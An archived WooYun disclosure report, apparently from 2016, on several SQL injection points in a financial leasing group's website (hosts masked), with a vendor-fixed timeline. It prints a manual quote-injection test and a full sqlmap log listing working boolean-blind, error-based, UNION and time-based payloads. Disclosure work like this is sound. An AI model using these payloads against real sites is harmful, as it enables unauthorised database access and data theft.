乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-02-16: 细节已通知厂商并且等待厂商处理中 2016-02-17: 厂商已经确认,细节仅向厂商公开 2016-02-17: 厂商已经修复漏洞并主动公开,细节向公众公开
中國金融租賃集團主站多處SQL註入打包提交
【注入点】:http://**.**.**.**/c/industry_news_details.php?itemid=479&page=1 http://www.**.**.**.**/c/corp_news_details.php?itemid=455&page=01 http://**.**.**.**/s/corp_news_details.php?itemid=455&page=01 他們存在於不同文件,有的是子目錄不同,所以是不同註入【手工测试】修改語句為:http://**.**.**.**/s/corp_news_details.php?itemid=455%27&page=01報錯信息,且泄露了路徑
【sqlmap截图】數據庫信息:
【乌云查重】查了下廠商名稱,只發現了http://**.**.**.**/bugs/wooyun-2010-0163764但是我和他的文件並不壹樣
sqlmap全过程:
[10:07:16] [INFO] testing connection to the target URL[10:07:17] [INFO] testing if the target URL is stable. This can take a couple of seconds[10:07:18] [INFO] target URL is stable[10:07:18] [INFO] testing if GET parameter 'itemid' is dynamic[10:07:18] [INFO] confirming that GET parameter 'itemid' is dynamic[10:07:18] [INFO] GET parameter 'itemid' is dynamic[10:07:19] [INFO] heuristic (basic) test shows that GET parameter 'itemid' might be injectable (possible DBMS: 'MySQL')[10:07:19] [INFO] testing for SQL injection on GET parameter 'itemid'heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do youwant to skip test payloads specific for other DBMSes? [Y/n]do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n][10:07:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[10:07:21] [WARNING] reflective value(s) found and filtering out[10:07:22] [INFO] GET parameter 'itemid' seems to be 'AND boolean-based blind -WHERE or HAVING clause' injectable[10:07:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[10:07:22] [INFO] GET parameter 'itemid' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable[10:07:22] [INFO] testing 'MySQL inline queries'[10:07:23] [INFO] testing 'MySQL > 5.0.11 stacked queries'[10:07:23] [WARNING] time-based comparison requires larger statistical model, please wait..................[10:07:26] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'[10:07:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[10:07:37] [INFO] GET parameter 'itemid' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable[10:07:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[10:07:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[10:07:37] [INFO] ORDER BY technique seems to be usable. This should reduce thetime needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[10:07:38] [INFO] target URL appears to have 5 columns in query[10:07:40] [INFO] GET parameter 'itemid' is 'MySQL UNION query (NULL) - 1 to 20columns' injectableGET parameter 'itemid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 40 HTTP(s) requests:---Parameter: itemid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: itemid=455 AND 2922=2922&page=01 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: itemid=455 AND (SELECT 1959 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (CASE WHEN (1959=1959) THEN 1 ELSE 0 END)),0x716a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&page=01 Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: itemid=455 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7671,0x477a427148656c74436d,0x716a627171),NULL,NULL#&page=01 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: itemid=455 AND SLEEP(5)&page=01---[10:07:44] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.29, Apache 2back-end DBMS: MySQL 5.0
PS:请问审核,以后提交香港台湾的漏洞,需不需要都转换为繁体字,还是简体字就可以?
危害等级:高
漏洞Rank:13
确认时间:2016-02-17 12:38
已將事件通知有關機構
2016-02-17:相關機構回報已修復漏洞